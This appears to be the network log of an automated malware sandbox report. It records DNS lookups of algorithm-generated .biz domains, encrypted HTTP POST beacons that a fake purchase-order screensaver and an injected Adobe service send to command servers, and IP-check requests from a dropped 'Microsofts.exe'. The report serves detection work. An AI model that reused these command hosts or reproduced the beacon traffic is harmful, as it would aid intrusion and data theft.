                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET8.8.8.8192.168.2.220xf478No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET8.8.8.8192.168.2.220xf478No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET8.8.8.8192.168.2.220xf478No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET8.8.8.8192.168.2.220xf478No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET8.8.8.8192.168.2.220xf478No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET8.8.8.8192.168.2.220xf478No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.904395103 CET8.8.8.8192.168.2.220x1d8aNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.885632038 CET8.8.8.8192.168.2.220x4a3No error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.613821030 CET8.8.8.8192.168.2.220x3No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.613821030 CET8.8.8.8192.168.2.220x3No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.155237913 CET8.8.8.8192.168.2.220x7dc0No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.155237913 CET8.8.8.8192.168.2.220x7dc0No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.958900928 CET8.8.8.8192.168.2.220xc0edName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.996045113 CET8.8.8.8192.168.2.220x6f9aNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.801728010 CET8.8.8.8192.168.2.220x44dbName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.813716888 CET8.8.8.8192.168.2.220xbfc3Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.894185066 CET8.8.8.8192.168.2.220x5e79No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:42.582453012 CET8.8.8.8192.168.2.220x4becNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.419126987 CET8.8.8.8192.168.2.220xb548No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.951411009 CET8.8.8.8192.168.2.220xde77No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.740870953 CET8.8.8.8192.168.2.220x40f7No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.261042118 CET8.8.8.8192.168.2.220xeffaNo error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.121848106 CET8.8.8.8192.168.2.220xf9d6No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.121848106 CET8.8.8.8192.168.2.220xf9d6No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.253349066 CET8.8.8.8192.168.2.220xd920No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.253349066 CET8.8.8.8192.168.2.220xd920No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET8.8.8.8192.168.2.220x3efcNo error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET8.8.8.8192.168.2.220x3efcNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET8.8.8.8192.168.2.220x3efcNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET8.8.8.8192.168.2.220x3415No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET8.8.8.8192.168.2.220x3415No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET8.8.8.8192.168.2.220x3415No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.110743046 CET8.8.8.8192.168.2.220xabe7Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.152160883 CET8.8.8.8192.168.2.220xb991No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.634495974 CET8.8.8.8192.168.2.220x6c7eName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.642644882 CET8.8.8.8192.168.2.220x22e2Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.652574062 CET8.8.8.8192.168.2.220x2629No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.748874903 CET8.8.8.8192.168.2.220x5fa2No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.632355928 CET8.8.8.8192.168.2.220xf946No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.190633059 CET8.8.8.8192.168.2.220xd2f7No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.748874903 CET8.8.8.8192.168.2.220x3faeNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.566715956 CET8.8.8.8192.168.2.220xc326No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.050683975 CET8.8.8.8192.168.2.220xaca3No error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.822382927 CET8.8.8.8192.168.2.220x6b2eNo error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.822382927 CET8.8.8.8192.168.2.220x6b2eNo error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.984603882 CET8.8.8.8192.168.2.220x8877No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.984603882 CET8.8.8.8192.168.2.220x8877No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET8.8.8.8192.168.2.220x77d3No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET8.8.8.8192.168.2.220x77d3No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET8.8.8.8192.168.2.220x77d3No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET8.8.8.8192.168.2.220x14e3No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET8.8.8.8192.168.2.220x14e3No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET8.8.8.8192.168.2.220x14e3No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.591279984 CET8.8.8.8192.168.2.220x6d77No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.262031078 CET8.8.8.8192.168.2.220x2034No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.821993113 CET8.8.8.8192.168.2.220x7c10No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.308505058 CET8.8.8.8192.168.2.220x8260No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.810899019 CET8.8.8.8192.168.2.220xc69fNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.235430956 CET8.8.8.8192.168.2.220xd687No error (0)fwiwk.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET8.8.8.8192.168.2.220x2651No error (0)ww12.fwiwk.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET8.8.8.8192.168.2.220x2651No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET8.8.8.8192.168.2.220x2651No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET8.8.8.8192.168.2.220xb14bNo error (0)ww12.fwiwk.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET8.8.8.8192.168.2.220xb14bNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET8.8.8.8192.168.2.220xb14bNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.401743889 CET8.8.8.8192.168.2.220x7749No error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.401743889 CET8.8.8.8192.168.2.220x7749No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.575774908 CET8.8.8.8192.168.2.220x510bNo error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.575774908 CET8.8.8.8192.168.2.220x510bNo error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.208211899 CET8.8.8.8192.168.2.220xd517No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.026063919 CET8.8.8.8192.168.2.220xaf89No error (0)deoci.biz34.227.7.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.532082081 CET8.8.8.8192.168.2.220x9694No error (0)gytujflc.biz208.117.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.169028997 CET8.8.8.8192.168.2.220x7c33No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.831235886 CET8.8.8.8192.168.2.220x37dNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.590039015 CET8.8.8.8192.168.2.220x98ffNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.324563026 CET8.8.8.8192.168.2.220xff61No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.248411894 CET8.8.8.8192.168.2.220x48e4No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.734153986 CET8.8.8.8192.168.2.220x9a2fNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.734153986 CET8.8.8.8192.168.2.220x9a2fNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.769293070 CET8.8.8.8192.168.2.220x39afNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.700954914 CET8.8.8.8192.168.2.220xf6d1No error (0)yunalwv.biz208.117.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.057585955 CET8.8.8.8192.168.2.220x48e4No error (0)jpskm.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.798438072 CET8.8.8.8192.168.2.220xd7d8No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                                                                                                                                        • pywolwnvd.biz
                                                                                                                                                                                                                                                                        • ssbzmoy.biz
                                                                                                                                                                                                                                                                        • checkip.dyndns.org
                                                                                                                                                                                                                                                                        • cvgrf.biz
                                                                                                                                                                                                                                                                        • npukfztj.biz
                                                                                                                                                                                                                                                                        • przvgke.biz
                                                                                                                                                                                                                                                                        • ww7.przvgke.biz
                                                                                                                                                                                                                                                                        • knjghuig.biz
                                                                                                                                                                                                                                                                        • lpuegx.biz
                                                                                                                                                                                                                                                                        • ww12.przvgke.biz
                                                                                                                                                                                                                                                                        • vjaxhpbji.biz
                                                                                                                                                                                                                                                                        • xlfhhhm.biz
                                                                                                                                                                                                                                                                        • ifsaia.biz
                                                                                                                                                                                                                                                                        • saytjshyf.biz
                                                                                                                                                                                                                                                                        • vcddkls.biz
                                                                                                                                                                                                                                                                        • fwiwk.biz
                                                                                                                                                                                                                                                                        • ww12.fwiwk.biz
                                                                                                                                                                                                                                                                        • ww7.fwiwk.biz
                                                                                                                                                                                                                                                                        • tbjrpv.biz
                                                                                                                                                                                                                                                                        • deoci.biz
                                                                                                                                                                                                                                                                        • gytujflc.biz
                                                                                                                                                                                                                                                                        • qaynky.biz
                                                                                                                                                                                                                                                                        • bumxkqgxu.biz
                                                                                                                                                                                                                                                                        • dwrqljrr.biz
                                                                                                                                                                                                                                                                        • nqwjmb.biz
                                                                                                                                                                                                                                                                        • ytctnunms.biz
                                                                                                                                                                                                                                                                        • myups.biz
                                                                                                                                                                                                                                                                        • oshhkdluh.biz
                                                                                                                                                                                                                                                                        • yunalwv.biz
                                                                                                                                                                                                                                                                        • jpskm.biz
                                                                                                                                                                                                                                                                        • lrxdmhrr.biz

                                                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.224916354.244.188.177803632C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.669348955 CET348OUTPOST /crs HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 808
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.669388056 CET808OUTData Raw: 8d 8a e3 d9 24 2b 10 63 1c 03 00 00 67 6a 75 d0 ca f7 02 0c 7d d3 63 7a 8a f0 cf 95 a4 fd 5c 2b e4 5b 27 62 bb 05 5d 9f 5b 06 da 08 4a 0e fa 93 3b 74 a2 c1 67 7d ce db 9d 60 7c 44 6b 47 0c 69 5b c3 9a 12 55 8f 21 2e 3b 50 92 c3 e9 c6 f0 af 4c c1
                                                                                                                                                                                                                                                                        Data Ascii: $+cgju}cz\+['b][J;tg}`|DkGi[U!.;PL53zTK4jR{){IwVE;|m=3zi)p=Rp8BZ%y\gd3"c6k^D9a`B574p5'K-#@'v[pw
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.335462093 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:08 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=d9438afd4d1b93ab295437df75ab987c|8.46.123.189|1736942228|1736942228|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.224916454.244.188.177803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.710762978 CET355OUTPOST /xvuqxulkih HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.710783958 CET850OUTData Raw: 58 ab 5e af 34 2d dc 70 46 03 00 00 12 94 5f 5a 10 28 b4 40 13 ef 1d 79 5a 15 e9 cc f5 7e 54 89 9b 29 02 53 da 5e 81 6b d1 9f 3b 4a ae 6d f0 1d 17 3d cf 9c 55 e2 72 8b 14 ff 99 41 0d 59 56 5b a7 d3 20 19 cc a8 af 00 95 7d cc 4a 7f 46 d8 ed f6 8e
                                                                                                                                                                                                                                                                        Data Ascii: X^4-pF_Z(@yZ~T)S^k;Jm=UrAYV[ }JF&J{nN-#|{VQwPkgI*E}HF@Fg5<bz`nZe_\&B\s*.,f)80$C_3VJ;A{$
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.390084028 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:08 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=2c202ab3e08a42c7f87abb610ca036d7|8.46.123.189|1736942228|1736942228|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.224916518.141.10.107803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.827080965 CET359OUTPOST /bjyjakehonafotkd HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.827114105 CET850OUTData Raw: df ae f9 a1 00 0e d5 5a 46 03 00 00 f5 7c 4c 21 18 3f 78 25 4a 1d 76 45 00 af cb 6b 51 ab 4d 06 87 03 82 8c 81 1c 3c 0c 09 a0 1b d5 e2 9e 42 01 8f be 98 49 e2 34 66 a1 a0 7a d1 59 c0 8f 44 e7 2a 10 48 36 e4 14 6a 0f 6f 26 aa 83 56 fd 2a 94 1a 7b
                                                                                                                                                                                                                                                                        Data Ascii: ZF|L!?x%JvEkQM<BI4fzYD*H6jo&V*{Q@B*l8;D!.=7`4GM9;7=tj&Bb@kjrk(gsA~a'#r8!VWJ$xCwes?$I}:
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.202420950 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:09 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=514b3fad1203dadb53751553cb78a532|8.46.123.189|1736942229|1736942229|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.2249166193.122.130.0803800C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.321055889 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.794862986 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:09 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Request-ID: 6a993c096f2264a0db21145c23fa4cee
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.003750086 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:09 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Request-ID: 6a993c096f2264a0db21145c23fa4cee
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.838721037 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.938925028 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Request-ID: 58ed4e033e2be769380a549f688a2553
